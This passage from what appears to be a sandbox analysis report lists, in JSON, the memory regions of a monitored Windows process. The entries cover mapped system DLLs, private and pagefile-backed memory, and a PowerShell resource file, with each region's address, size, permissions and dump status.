"process_00000005-region_00000839-addr_0x00000000004a0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_207", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 4849664, "type": "region", "version": 1 }, "end_va": 4915199, "entry_point": 0, "filename": null, "id": "region_839", "name": "private_0x00000000004a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4849664, "timestamp": "00:00:46.294", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1941241856, "type": "region", "version": 1 }, "end_va": 1941323775, "entry_point": 1941241856, "filename": "\\Windows\\SysWOW64\\atl.dll", "id": "region_840", "name": "atl.dll", "norm_filename": "c:\\windows\\syswow64\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1941241856, "timestamp": "00:00:46.294", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1948450816, "type": "region", "version": 1 }, "end_va": 1948753919, "entry_point": 1948462676, "filename": "\\Windows\\SysWOW64\\mscoree.dll", "id": "region_841", "name": "mscoree.dll", "norm_filename": "c:\\windows\\syswow64\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 1948450816, "timestamp": "00:00:46.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_842", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:00:46.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_843", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:00:46.307", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_844", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:00:46.307", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_845", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:00:46.308", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_846", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:00:46.308", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_847", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:00:46.309", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_848", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:46.310", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_849", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:00:46.310", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_850", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:00:46.311", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_851", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:00:46.311", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_852", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:00:46.312", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_853", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:00:46.312", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_854", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:00:46.312", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_855", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:00:46.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_856", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:00:46.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_857", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:46.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_858", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:46.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 6520831, "entry_point": 0, "filename": null, "id": "region_859", "name": "pagefile_0x00000000004b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4915200, "timestamp": "00:00:46.318", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_860", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:00:46.318", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_861", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:00:46.318", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_862", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:46.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1449983, "entry_point": 0, "filename": null, "id": "region_863", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:00:46.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1519615, "entry_point": 1507328, "filename": "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_864", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 1507328, "timestamp": "00:00:46.375", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000865-addr_0x0000000000180000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_208", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_865", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:00:46.386", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000866-addr_0x00000000001d0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_209", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1904639, "entry_point": 0, "filename": null, "id": "region_866", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:00:46.387", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000867-addr_0x0000000000200000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_210", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_867", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:00:46.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6553600, "type": "region", "version": 1 }, "end_va": 8130559, "entry_point": 0, "filename": null, "id": "region_868", "name": "pagefile_0x0000000000640000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6553600, "timestamp": "00:00:46.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8192000, "type": "region", "version": 1 }, "end_va": 29163519, "entry_point": 0, "filename": null, "id": "region_869", "name": "pagefile_0x00000000007d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8192000, "timestamp": "00:00:46.387", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000870-addr_0x0000000001d60000-size_0x0000000000040000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_211", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 30801920, "type": "region", "version": 1 }, "end_va": 31064063, "entry_point": 0, "filename": null, "id": "region_870", "name": "private_0x0000000001d60000", "norm_filename": null, "region_type": "private_memory", "start_va": 30801920, "timestamp": "00:00:46.388", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1943732224, "type": "region", "version": 1 }, "end_va": 1944256511, "entry_point": 1943812041, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_871", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1943732224, "timestamp": "00:00:46.388", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1970175, "entry_point": 0, "filename": null, "id": "region_872", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1966080, "timestamp": "00:00:46.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 4583423, "entry_point": 0, "filename": null, "id": "region_873", "name": "pagefile_0x0000000000380000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3670016, "timestamp": "00:00:46.393", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000874-addr_0x0000000001f60000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_212", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 32899072, "type": "region", "version": 1 }, "end_va": 33161215, "entry_point": 0, "filename": null, "id": "region_874", "name": "private_0x0000000001f60000", "norm_filename": null, "region_type": "private_memory", "start_va": 32899072, "timestamp": "00:00:46.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_875", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:00:46.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_876", "name": "pagefile_0x00000000001f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2031616, "timestamp": "00:00:46.398", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1969553408, "type": "region", "version": 1 }, "end_va": 1982439423, "entry_point": 1970083329, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_877", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1969553408, "timestamp": "00:00:46.398", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1941110784, "type": "region", "version": 1 }, "end_va": 1941204991, "entry_point": 1941110784, "filename": "\\Windows\\SysWOW64\\userenv.dll", "id": "region_878", "name": "userenv.dll", "norm_filename": "c:\\windows\\syswow64\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1941110784, "timestamp": "00:00:46.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1957953536, "type": "region", "version": 1 }, "end_va": 1957998591, "entry_point": 1957960082, "filename": "\\Windows\\SysWOW64\\profapi.dll", "id": "region_879", "name": "profapi.dll", "norm_filename": "c:\\windows\\syswow64\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1957953536, "timestamp": "00:00:46.415", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2170879, "entry_point": 0, "filename": null, "id": "region_880", "name": "pagefile_0x0000000000210000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2162688, "timestamp": "00:00:46.427", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1954676736, "type": "region", "version": 1 }, "end_va": 1956372479, "entry_point": 1954866869, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_881", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1954676736, "timestamp": "00:00:46.427", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 0, "filename": null, "id": "region_882", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:00:46.452", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2301951, "entry_point": 0, "filename": null, "id": "region_883", "name": "pagefile_0x0000000000230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2293760, "timestamp": "00:00:46.452", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000884-addr_0x0000000001ce0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_213", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 30277632, "type": "region", "version": 1 }, "end_va": 30539775, "entry_point": 0, "filename": null, "id": "region_884", "name": "private_0x0000000001ce0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30277632, "timestamp": "00:00:46.452", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000885-addr_0x0000000001e80000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_214", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 31981568, "type": "region", "version": 1 }, "end_va": 32243711, "entry_point": 0, "filename": null, "id": "region_885", "name": "private_0x0000000001e80000", "norm_filename": null, "region_type": "private_memory", "start_va": 31981568, "timestamp": "00:00:46.452", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33161216, "type": "region", "version": 1 }, "end_va": 36106239, "entry_point": 33161216, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_886", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33161216, "timestamp": "00:00:46.452", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1956839424, "type": "region", "version": 1 }, "end_va": 1957842943, "entry_point": 1956908446, "filename": "\\Windows\\SysWOW64\\propsys.dll", "id": "region_887", "name": "propsys.dll", "norm_filename": "c:\\windows\\syswow64\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1956839424, "timestamp": "00:00:46.453", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000888-addr_0x000000007efd8000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_215", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_888", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:00:46.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1988427776, "type": "region", "version": 1 }, "end_va": 1988587519, "entry_point": 1988450489, "filename": "\\Windows\\SysWOW64\\cfgmgr32.dll", "id": "region_889", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\syswow64\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 1988427776, "timestamp": "00:00:46.456", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1991114752, "type": "region", "version": 1 }, "end_va": 1992806399, "entry_point": 1991120871, "filename": "\\Windows\\SysWOW64\\setupapi.dll", "id": "region_890", "name": "setupapi.dll", "norm_filename": "c:\\windows\\syswow64\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1991114752, "timestamp": "00:00:46.457", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1995112448, "type": "region", "version": 1 }, "end_va": 1995186175, "entry_point": 1995117633, "filename": "\\Windows\\SysWOW64\\devobj.dll", "id": "region_891", "name": "devobj.dll", "norm_filename": "c:\\windows\\syswow64\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1995112448, "timestamp": "00:00:46.457", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 36110336, "type": "region", "version": 1 }, "end_va": 40251391, "entry_point": 0, "filename": null, "id": "region_892", "name": "pagefile_0x0000000002270000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 36110336, "timestamp": "00:00:46.461", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1956642816, "type": "region", "version": 1 }, "end_va": 1956777983, "entry_point": 1956648030, "filename": "\\Windows\\SysWOW64\\ntmarta.dll", "id": "region_893", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\syswow64\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1956642816, "timestamp": "00:00:46.461", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1982464000, "type": "region", "version": 1 }, "end_va": 1982746623, "entry_point": 1982468577, "filename": "\\Windows\\SysWOW64\\Wldap32.dll", "id": "region_894", "name": "wldap32.dll", "norm_filename": "c:\\windows\\syswow64\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1982464000, "timestamp": "00:00:46.462", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 4796415, "entry_point": 4653056, "filename": 